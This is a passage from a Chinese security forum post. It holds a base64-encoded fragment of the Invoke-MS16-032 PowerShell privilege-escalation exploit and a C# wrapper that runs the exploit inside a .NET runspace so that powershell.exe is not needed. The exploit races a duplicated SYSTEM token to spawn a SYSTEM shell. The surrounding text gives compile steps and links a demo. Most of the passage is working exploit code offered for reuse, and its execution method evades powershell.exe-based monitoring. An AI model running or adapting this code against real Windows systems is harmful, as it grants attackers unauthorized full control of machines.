IGluICRUaHJlYWRBcnJheSl7CiAgICAKICAgICAgICAjIEdldCBoYW5kbGUgdG8gU1lTVEVNIGFjY2VzcyB0b2tlbgogICAgICAgIEdldC1TeXN0ZW1Ub2tlbgogICAgICAgIAogICAgICAgIGVjaG8gImBuWypdIFNuaWZmaW5nIG91dCBTWVNURU0gc2hlbGwuLiIKICAgICAgICBlY2hvICJgbls+XSBEdXBsaWNhdGluZyBTWVNURU0gdG9rZW4iCiAgICAgICAgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSA9IFtJbnRQdHJdOjpaZXJvCiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpEdXBsaWNhdGVUb2tlbigkU3lzVG9rZW5IYW5kbGUsIDIsIFtyZWZdJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAKICAgICAgICAjIFNpbXBsZSBQUyBydW5zcGFjZSBkZWZpbml0aW9uCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHRva2VuIHJhY2UiCiAgICAgICAgJFJ1bnNwYWNlID0gW3J1bnNwYWNlZmFjdG9yeV06OkNyZWF0ZVJ1bnNwYWNlKCkKICAgICAgICAkU3RhcnRUb2tlblJhY2UgPSBbcG93ZXJzaGVsbF06OkNyZWF0ZSgpCiAgICAgICAgJFN0YXJ0VG9rZW5SYWNlLnJ1bnNwYWNlID0gJFJ1bnNwYWNlCiAgICAgICAgJFJ1bnNwYWNlLk9wZW4oKQogICAgICAgIFt2b2lkXSRTdGFydFRva2VuUmFjZS5BZGRTY3JpcHQoewogICAgICAgICAgICBQYXJhbSAoJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgd2hpbGUgKCR0cnVlKSB7CiAgICAgICAgICAgICAgICAkQ2FsbFJlc3VsdCA9IFtBZHZhcGkzMl06OlNldFRocmVhZFRva2VuKFtyZWZdJFRocmVhZCwgJGhEdXBsaWNhdGVUb2tlbkhhbmRsZSkKICAgICAgICAgICAgfQogICAgICAgIH0pLkFkZEFyZ3VtZW50KCRUaHJlYWQpLkFkZEFyZ3VtZW50KCRoRHVwbGljYXRlVG9rZW5IYW5kbGUpCiAgICAgICAgJEFzY09iaiA9ICRTdGFydFRva2VuUmFjZS5CZWdpbkludm9rZSgpCiAgICAgICAgCiAgICAgICAgZWNobyAiWz5dIFN0YXJ0aW5nIHByb2Nlc3MgcmFjZSIKICAgICAgICAjIEFkZGluZyBhIHRpbWVvdXQgKDEwIHNlY29uZHMpIGhlcmUgdG8gc2FmZWd1YXJkIGZyb20gZWRnZS1jYXNlcwogICAgICAgICRTYWZlR3VhcmQgPSBbZGlhZ25vc3RpY3Muc3RvcHdhdGNoXTo6U3RhcnROZXcoKQogICAgICAgIHdoaWxlICgkU2FmZUd1YXJkLkVsYXBzZWRNaWxsaXNlY29uZHMgLWx0IDEwMDAwKSB7CiAgICAgICAgIyBTdGFydHVwSW5mbyBTdHJ1Y3QKICAgICAgICAkU3RhcnR1cEluZm8gPSBOZXctT2JqZWN0IFNUQVJUVVBJTkZPCiAgICAgICAgJFN0YXJ0dXBJbmZvLmNiID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6U2l6ZU9mKCRTdGFydHVwSW5mbykgIyBTdHJ1Y3QgU2l6ZQogICAgICAgICRTdGFydHVwSW5mby5kd0ZsYWdzID0gMHgwMDAwMDEwMSAjIFNUQVJURl9VU0VTVERIQU5ETEVTCiAgICAgICAgICAgICRTdGFydHVwSW5mby53U2hvd1dpbmRvdyA9IDA7CiAgICAgICAgIyBQcm9jZXNzSW5mbyBTdHJ1Y3QKICAgICAgICAkUHJvY2Vzc0luZm8gPSBOZXctT2JqZWN0IFBST0NFU1NfSU5GT1JNQVRJT04KICAgICAgICAKICAgICAgICAjIENyZWF0ZVByb2Nlc3NXaXRoTG9nb25XIC0tPiBscEN1cnJlbnREaXJlY3RvcnkKICAgICAgICAkR2V0Q3VycmVudFBhdGggPSAoR2V0LUl0ZW0gLVBhdGggIi5cIiAtVmVyYm9zZSkuRnVsbE5hbWUKICAgICAgICAKICAgICAgICAjIExPR09OX05FVENSRURFTlRJQUxTX09OTFkgLyBDUkVBVEVfU1VTUEVOREVECiAgICAgICAgJENhbGxSZXN1bHQgPSBbQWR2YXBpMzJdOjpDcmVhdGVQcm9jZXNzV2l0aExvZ29uVygKICAgICAgICAgICAgInVzZXIiLCAiZG9tYWluIiwgInBhc3MiLAogICAgICAgICAgICAweDAwMDAwMDAyLCAkQXBwbGljYXRpb24sJENvbW1hbmRsaW5lLAogICAgICAgICAgICAweDAwMDAwMDA0LCAkbnVsbCwgJEdldEN1cnJlbnRQYXRoLAogICAgICAgICAgICBbcmVmXSRTdGFydHVwSW5mbywgW3JlZl0kUHJvY2Vzc0luZm8pCiAgICAgICAgICAgIAogICAgICAgICRoVG9rZW5IYW5kbGUgPSBbSW50UHRyXTo6WmVybwogICAgICAgICRDYWxsUmVzdWx0ID0gW0FkdmFwaTMyXTo6T3BlblByb2Nlc3NUb2tlbigkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDB4MjgsIFtyZWZdJGhUb2tlbkhhbmRsZSkKICAgICAgICAjIElmIHdlIGNhbid0IG9wZW4gdGhlIHByb2Nlc3MgdG9rZW4gaXQncyBhIFNZU1RFTSBzaGVsbCEKICAgICAgICBpZiAoISRDYWxsUmVzdWx0KSB7CiAgICAgICAgICAgIGVjaG8gIlshXSBIb2x5IGhhbmRsZSBsZWFrIEJhdG1hbiwgd2UgaGF2ZSBhIFNZU1RFTSBzaGVsbCEhYG4iCiAgICAgICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6UmVzdW1lVGhyZWFkKCRQcm9jZXNzSW5mby5oVGhyZWFkKQogICAgICAgICAgICAkU3RhcnRUb2tlblJhY2UuU3RvcCgpCiAgICAgICAgICAgICRTYWZlR3VhcmQuU3RvcCgpCiAgICAgICAgICAgIFJldHVybgogICAgICAgIH0KICAgICAgICAgICAgCiAgICAgICAgIyBDbGVhbiB1cCBzdXNwZW5kZWQgcHJvY2VzcwogICAgICAgICRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6VGVybWluYXRlUHJvY2VzcygkUHJvY2Vzc0luZm8uaFByb2Nlc3MsIDEpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFByb2Nlc3MpCiAgICAgICAgJENhbGxSZXN1bHQgPSBbS2VybmVsMzJdOjpDbG9zZUhhbmRsZSgkUHJvY2Vzc0luZm8uaFRocmVhZCkKICAgICAgICB9CiAgICAgICAgCiAgICAgICAgIyBLaWxsIHJ1bnNwYWNlICYgc3RvcHdhdGNoIGlmIGVkZ2UtY2FzZQogICAgICAgICRTdGFydFRva2VuUmFjZS5TdG9wKCkKICAgICAgICAkU2FmZUd1YXJkLlN0b3AoKQogICAgfQp9"));
    public void ExecuteSynchronously(string aplication,string commandline)
    {
      string Commandout;
      InitialSessionState iss = InitialSessionState.CreateDefault();
      Runspace rs = RunspaceFactory.CreateRunspace(iss);
      rs.Open();
      PowerShell ps = PowerShell.Create();
      ps.Runspace = rs;
      ps.AddScript(PSInvoke_MS16_032);
      if (commandline != "")
      {
         Commandout = "Invoke-MS16-032 -Application \"" + aplication + "\" -Commandline " + "\""+commandline+"\"";
      }
      else{
         Commandout = "Invoke-MS16-032 -Application " + aplication;
      }
      Console.WriteLine(Commandout);
      ps.AddScript(Commandout);
      ps.AddCommand("Out-Default");
      ps.Invoke();
      rs.Close();
    }
  }
}

base64的内容是 https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1 的所有内容的base64编码(你可以使用你自己的powershell脚本),由于我改的这个是有参数的,所以简单的写了上面的c#代码,通过.net来执行powershell。

编译需要System.Management.Automation.dll,具体步骤在cs文件里面已经写了,你们自己编译吧,只是对本机进行了测试,没测试别的,测试Demo如下:

http://static.wooyun.org/upload/image/201606/2016063013052815262.gif

通过.net来执行powershell,并不需要powershell.exe 。详情可以看一下 p0wnedShell 或者 http://zone.wooyun.org/content/26831

.net 2.0下编译的版本在这里

最后由 Evi1cg 编辑于2017年01月17日 16:15